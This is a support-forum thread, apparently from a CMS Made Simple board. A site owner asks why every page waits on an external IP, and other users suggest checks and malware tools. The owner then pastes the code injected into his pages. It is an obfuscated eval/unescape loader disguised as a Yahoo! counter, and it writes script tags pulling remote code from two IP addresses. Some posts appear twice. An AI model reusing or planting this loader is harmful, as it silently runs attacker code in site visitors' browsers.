Every page I go to as visitor or admin status bar says "Waiting on 78.157.142.58
I found post about this but most all were WordPress site being hacked.
Anyone know anything about this?
I have deleted all file except uploads and config then uploaded latest version and ran /install/upgrade.php
Thanks for your help
Mark
admin and frontend waiting on 78.157.142.58
-
michi1979
Re: admin and frontend waiting on 78.157.142.58
Is the webserver running on this host ?
There is no server listening on port 80 (http).
Greetings,
Michael
There is no server listening on port 80 (http).
Greetings,
Michael
Re: admin and frontend waiting on 78.157.142.58
Do you only have issues on your CMS Made Simple site? (can you post a link?)dmgd wrote: Every page I go to as visitor or admin status bar says "Waiting on 78.157.142.58
I found post about this but most all were WordPress site being hacked.
After a quick search on this IP the posts I've found point to a local script injection problem that changes/adds searchengine results:
http://www.bleepingcomputer.com/forums/ ... 75838.html
http://miekiemoes.blogspot.com/2008/10/ ... ngine.html
Make sure you're running up-to-date anti-virussoftware.
Try running a Malware removal tool like Combofix
Regards,
D
Re: admin and frontend waiting on 78.157.142.58
Thanks for the reply.
No this is not my host.
I did a little more research and some how this is added to the output just before . I can not find where it is inserted. I have deleted every file except config and uploads. I see nothing wrong in uploads (only appropriate file extensions image flash) or config. Uploaded latest version and ran upgrade. The following code is still inserted.
No this is not my host.
I did a little more research and some how this is added to the output just before . I can not find where it is inserted. I have deleted every file except config and uploads. I see nothing wrong in uploads (only appropriate file extensions image flash) or config. Uploaded latest version and ran upgrade. The following code is still inserted.
Code: Select all
<__script__ language="javascript">
1<!-- Yahoo! Counter starts here -->
2if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%76a%72?%20?%61$%2C@%69!%2C@%5F$%3B%69`%3D"%37%36%2E%31~63$%2E%22%3B%61%3D%5B|%22?7?8?%2E?%315%37`%2E1$%34%32$%2E%35%38%22|,i+`%22%31|%34~1!.#3#5"$%2C@%69+"?%31~%39%31.@1!%33~2"@%5D;%5F~%3D|%31@;`i`f@%28?%64o~cu$%6D%65!%6E%74@.co$%6F`%6B~ie%2E|%6Dat@c`%68`(`%2F%5C%62%68`gf%74=1|/%29$%3D%3D`%6E!%75%6C$%6C%29`%66$%6F%72%28%69!%3D?0;i?%3C`3;i`++~)`%64o?%63%75$%6D#%65%6Et`%2Ewr%69`%74%65(@%22%3Cs%63%72$%69~%70t#%3E!%69%66`%28%5F)%64|o|%63!um%65$%6E$%74?%2E~%77r%69te?%28%5C|%22@%3C%73%63%72%69p$%74~%20!%69~d=_|%22%2B|%69+"!%5F#%20%73!%72c!%3D%2F$%2F%22$%2B~a@%5Bi%5D`+%22!%2F@c~p!%2F%3E%3C%5C%5C!/!%73c?%72|i$%70%74%3E%5C%22@%29%3C@%5C`%2F%73cr?%69%70@t%3E?%22)#%3B').replace(/\||\$|@|#|~|\!|`|\?/g,""));var yahoo_counter=1;
3<!-- counter end -->
</__script>
<__script__>
1if(_)document.write("<__script__ id=_0_ src=//78.157.142.58/cp/><\/script>")
</__script>
<__script__ id="_0_" src="//78.157.142.58/cp/">
1
</__script>
<__script__>
</__script>
<__script__ id="_1_" src="//76.163.141.35/cp/">Mark
